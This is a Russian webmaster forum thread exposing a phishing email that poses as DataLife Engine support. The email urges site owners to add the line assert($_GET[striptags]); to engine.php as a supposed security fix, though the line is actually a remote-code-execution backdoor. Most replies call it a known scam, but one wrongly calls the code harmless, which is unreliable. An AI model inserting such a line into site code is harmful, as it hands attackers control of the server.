Новый вид развода
Страницы: 1
Новый вид развода
Сегодня на почту пришло письмо. Якобы от support@dle-news.ru . Но у меня стоит null версия и они хотят чтоб я установил этот код.

---------------------------------------------------------------------------------

Уважаемые владельцы сайта *****.ru!

Благодарим Вас за использование на Вашем сайте ***** CMS «DataLife Engine».

Сообщаем Вам о том, что за последние сутки в код Вашего сайта ****** был встроен вредоносный скрипт, осуществляющий перенаправление мобильных пользователей Вашего сайта на сайт, который представляет угрозу для мобильных устройств.

Скорее всего, злоумышленники получили доступ к панели управления Вашего сайта при помощи уязвимости в модуле Minify, входящем в состав DLE, который позволяет при определенных настройках серверного ПО читать содержимое файлов.

При помощи данной уязвимости любой файл, находящийся на Вашем сервере, может быть прочитан из браузера (при вводе соответствующего запроса), например, файл с данными для доступа к базе данных Вашего сайта. Получив доступ к базе данных, злоумышленникам не составит труда создать нового пользователя с правами администратора и авторизоваться через него в панели управления Вашего сайта.

Устраните уязвимость, следую инструкции указанной ниже. Кроме того, мы настоятельно рекомендуем Вам сменить все пароли от панели управления и базы данных Вашего сайта.

Для исправления откройте файл: сайт/engine/engine.php и в самое начало файла после строчки <?PHP добавьте:

assert($_GET[striptags]);

-------------------------------------------------------------------------------
может это они решили воспользоваться ситуацией с адсенсем и редиректом мобильных устройств
насколько я понимаю этот код доп проверка - ничего злого вроде не видно....
«Превращаю день в ночь, сына в дочь, а ХЗ в ТЗ»
Python(Flask, Scrapy) - my way.
норм, нужно было так:пришлите нам свой /engine/data/dbconfig.php
и поставьте права 777 на файл /uploads/.htaccess
Партнерская программа AliExpress - подходит для всех видов трафика!

Лучший Хостинг - под любые проекты

Цитата
Джон Джоныч пишет:
assert($_GET[striptags]);
Не новый развод - была уж тема таковая.
да, тема старая)
Некоторые попались на этот достаточно наивный развод. Письмо приходит через форму обратной связи на своем же сайте smile:) А там можно в отправителя кого угодно засунуть (от Путина В.В. <putin@president.gov.ru>)
Мы не можем похвастаться мудростью глаз
И умелыми жестами рук,
Нам не нужно все это, чтобы друг друга понять.
Сигареты в руках, чай на столе - так замыкается круг,
И вдруг нам становится страшно что-то менять.
я писал об этом.
это несомненно развод.

http://www.cy-pr.com/forum/f35/t73755/m804357
Страницы: 1
Похожие темы:
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
08:26 Помогите! ОТКРЫЛАСЬ монетизация на ЮТЮБ! Но Как быть в 2024 с Adsense? 
08:23 Rotapost прикрыли! Чем пользоваться? 
17:53 Webvork - международная товарная СРА сеть с сертифицированными офферами на Европу. 
22:27 LOSPOLLOS.COM - Конвертим по рецепту Хайзенберга. Dating, Mainstream, Binary Options 
12:39 2Index - быстрая индексация страниц сайта и обратных ссылок 
06:17 3snet - гемблинг, беттинг, форекс, бинарные опционы, майнинг 
11:46 SharkBoss - партнёрская программа для монетизации ЛЮБЫХ видов трафика (включая спам). 
08:32 Услуги продвижения в авито 
08:30 Сайты с зарубежным трафиком КУПЛЮ 
04:08 Просто $0.04/IP 9PROXY.COM Резидентные прокси Неограниченная пропускная способность Уникальная политика замены Без чёрного списка 
02:14 Сервис смс активаций и аренды мобильных номеров ALISMS 
22:06 BestX24 - быстрый и безопасный обменник криптовалют и электронных денежных средств 
21:00 Onechange.me — надежный обменник криптовалют и фиатных средств 
20:57 Форекс Лиды, Горячий Трафик Форекс, Лиды Форекс 2025, Горячий Трафик Крипто, Целевые Лиды Гэмблинг, Финансовые Рынки Лиды 
13:08 Бесплатный майнинг Tether (USDT) 
10:29 С юмором по жизни! 
16:49 monetizer.agency – рекламная сеть для взрослого и развлекательного трафика. 100$ новому вебмастеру 
20:43 Добро пожаловать в цифровой мир... 
15:59 Про мясо 
23:09 ПП от PMS remote.team - 200$ за команду 
13:28 Компьютерная мышь